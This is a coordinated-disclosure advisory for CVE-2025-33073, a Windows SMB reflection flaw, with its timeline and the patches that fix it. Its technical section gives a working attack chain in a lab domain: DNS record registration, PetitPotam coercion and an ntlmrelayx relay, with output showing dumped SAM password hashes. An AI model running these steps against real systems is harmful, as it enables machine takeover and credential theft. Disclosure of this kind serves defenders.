Windows Authenticated Remote Command Execution
21/07/2025 - Téléchargement
Product
Windows
Severity
Critical
Fixed Version(s)
KB5060525, KB5060526, KB5060531, KB5060533, KB5060841, KB5060842, KB5060998, KB5060999, KB5061010, KB5061018, KB5061026, KB5061036, KB5061059, KB5061072, KB5061078
Affected Version(s)
All versions of Windows
CVE Number
Authors
Description
Presentation
Windows is a product line of proprietary graphical operating systems developed and marketed by Microsoft.
Issue(s)
A lack of check in Windows SMB client allows an authenticated attacker to perform a reflection attack to compromise any Windows machine which does not enforce SMB signing.
Timeline
| Date | Description |
|---|---|
| 2025.03.12 | Advisory sent to MSRC |
| 2025.04.08 | Vulnerability acknowledged by Microsoft |
| 2025.05.30 | Vulnerability assigned CVE-2025-33073 |
| 2025.06.10 | Patch published by Microsoft in June 2025 Patch Tuesday |
| 2025.07.21 | Public release of the advisory |
Technical details
Authenticated Remote Command Execution
Description
By registering a DNS record pointing to a controlled IP address and containing marshalled target information, coercing a machine into authenticating to the record and relaying back the authentication to the same machine, it is possible to execute remote commands as SYSTEM.
To compromise the machine SRV1, the srv11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA DNS record must be registered. By default, any authenticated user in the domain can register a DNS record:
$ dnstool.py -u 'ASGARD.LOCAL\loki' -p loki 192.168.56.10 -a add -r srv11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -d 192.168.56.3
[-] Adding new record
[+] LDAP operation completed successfully
Then, the machine must be coerced into authenticating to the previously added record (which points to a controlled IP address):
$ PetitPotam.py -u loki -p loki -d ASGARD.LOCAL srv11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA SRV1.ASGARD.LOCAL
[-] Sending EfsRpcEncryptFileSrv!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!
Finally, the authentication is relayed back to the original machine (authentication reflection):
# ntlmrelayx.py -t SRV1.ASGARD.LOCAL -smb2support
[*] Servers started, waiting for connections
[*] SMBD-Thread-5 (process_request_thread): Received connection from 192.168.56.14, attacking target smb://SRV1.ASGARD.LOCAL
[*] Authenticating against smb://SRV1.ASGARD.LOCAL as / SUCCEED
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x0c10b250470be78cbe1c92d1b7fe4e91
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:df3c08415194a27d27bb67dcbf6a6ebc:::
user:1000:aad3b435b51404eeaad3b435b51404ee:57d583aa46d571502aad4bb7aea09c70:::
[*] Done dumping SAM hashes for host: 192.168.56.14
As seen in the previous output, the relay worked. Moreover, as the relayed identity is SYSTEM, privileged actions can be performed via SMB, such as dumping the registry hives remotely, which implies the compromise of the machine.
The complete analysis of the vulnerability can be found in the associated blogpost.
Impact
An authenticated user can execute remote commands as SYSTEM on any Windows machine which does not enforce SMB signing.